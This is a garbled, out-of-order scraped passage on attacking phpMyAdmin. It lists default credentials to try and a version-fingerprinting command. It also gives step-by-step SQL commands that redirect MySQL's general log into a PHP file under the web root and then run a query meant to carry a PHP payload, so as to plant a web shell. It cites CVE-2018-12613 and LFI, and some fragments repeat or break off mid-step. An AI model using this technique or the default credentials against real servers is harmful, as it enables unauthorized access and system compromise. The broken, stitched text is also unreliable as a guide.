SHOW VARIABLES LIKE "secure_file_priv";
Many setups, especially in development environments, neglect to change default database credentials. Try logging in with: root | Password: (blank) Username: root | Password: root Username: pma | Password: (blank) Config File Exposure
privilege. For more detailed methodologies, see the HackTricks MySQL guide. phpMyAdmin Improper Authentication · CVE-2018-12613 phpmyadmin hacktricks verified
Use whatweb target.com/phpmyadmin – it often extracts version from meta generators.
The primary goal of attacking phpMyAdmin is typically to move from database access to a web shell or system-level compromise: Disable the log to prevent file corruption: SET
SET GLOBAL general_log = 'on'; SET GLOBAL general_log_file = '/var/www/html/logshell.php'; Use code with caution. Execute a query containing your PHP payload: SELECT ''; Use code with caution. Disable the log to prevent file corruption: SET GLOBAL general_log = 'off'; Use code with caution. Access http://target.com to trigger your code. 4. Notable Verified CVEs and Vulnerabilities
phpMyAdmin is vulnerable to LFI attacks when the "open_basedir" restriction is not enabled. An attacker can include malicious files to execute system-level commands or extract sensitive information. SET GLOBAL general_log_file = '/var/www/html/logshell.php'
Older legacy versions (2.11.x before 2.11.9.5 and 2.13.x before 2.13.0.2)
To stay secure, administrators should follow the official phpMyAdmin Security Advisories :